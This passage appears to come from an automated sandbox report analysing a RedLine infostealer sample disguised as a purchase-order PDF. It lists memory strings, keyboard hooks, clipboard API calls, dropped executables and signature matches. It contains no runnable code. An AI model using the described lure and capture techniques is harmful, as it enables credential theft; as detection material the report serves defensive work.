                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: AppVClient.exe, 00000016.00000002.2186021378.0000000000522000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182914960.0000000000512000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2181851858.0000000000503000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182028014.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: powershell.exe, 0000000A.00000002.2200928108.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                            Source: build.exe, 00000007.00000002.2559158756.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                            Source: build.exe, 00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                            Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\microsofts.exe
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00459FFF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Window created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0047C08E

                            System Summary

                            Source: 5.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                            Source: 4.2.svchost.exe.5600000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                            Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                            Source: initial sample | Static PE information: Filename: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004364AA
                            Source: C:\Windows\System32\alg.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\97dd988331e417df.bin
                            Source: C:\Windows\System32\wbengine.exe | File created: C:\Windows\Logs\WindowsBackup
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044ED9A3_2_0044ED9A
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00423EBF3_2_00423EBF
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00424F703_2_00424F70
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0041AF0D3_2_0041AF0D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B15F03_2_057B15F0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B0D5804_2_04B0D580
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD7F804_2_04AD7F80
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B037804_2_04B03780
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B0C7F04_2_04B0C7F0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B100D94_2_04B100D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B139A34_2_04B139A3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD6EAF4_2_04AD6EAF
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B059804_2_04B05980
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD51EE4_2_04AD51EE
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD7B714_2_04AD7B71
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_0162DC747_2_0162DC74
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4F5887_2_05B4F588
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4D5707_2_05B4D570
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4E4807_2_05B4E480
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4A4E87_2_05B4A4E8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B497887_2_05B49788
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B45FF07_2_05B45FF0
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4C7C87_2_05B4C7C8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4CE087_2_05B4CE08
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B1287_2_05B4B128
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B481687_2_05B48168
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B8787_2_05B4B878
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4EBB87_2_05B4EBB8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4A4D97_2_05B4A4D9
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4E46F7_2_05B4E46F
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4C7BA7_2_05B4C7BA
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B44FD87_2_05B44FD8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B457207_2_05B45720
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B477287_2_05B47728
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B497787_2_05B49778
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4CE077_2_05B4CE07
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B1187_2_05B4B118
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4815A7_2_05B4815A
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B418D87_2_05B418D8
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B4B8697_2_05B4B869
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B402E07_2_05B402E0
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B402D07_2_05B402D0
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 8_2_014585C88_2_014585C8
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 8_2_014585B78_2_014585B7
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006A7C009_2_006A7C00
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006CA8109_2_006CA810
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006D2D409_2_006D2D40
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006A79F09_2_006A79F0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006C92A09_2_006C92A0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006CEEB09_2_006CEEB0
                            Source: C:\Windows\System32\alg.exeCode function: 9_2_006C93B09_2_006C93B0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_046CB49010_2_046CB490
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 00425210 appears 58 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 0041718C appears 90 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: String function: 0043362D appears 38 times
Source: Acrobat.exe.5.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.5.dr | Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.5.dr | Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.132_chrome_installer.exe.5.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.5.dr | Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: chrome_pwa_launcher.exe.5.dr | Static PE information: Number of sections : 13 > 10
Source: chrmstp.exe.5.dr | Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe0.5.dr | Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.5.dr | Static PE information: Number of sections : 12 > 10
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074370373.000000000429D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.00000000040F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2104936203.0000000004193000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2105107664.000000000433D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.svchost.exe.5600000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: armsvc.exe.4.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ShowAppPickerForPDF.exe.5.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
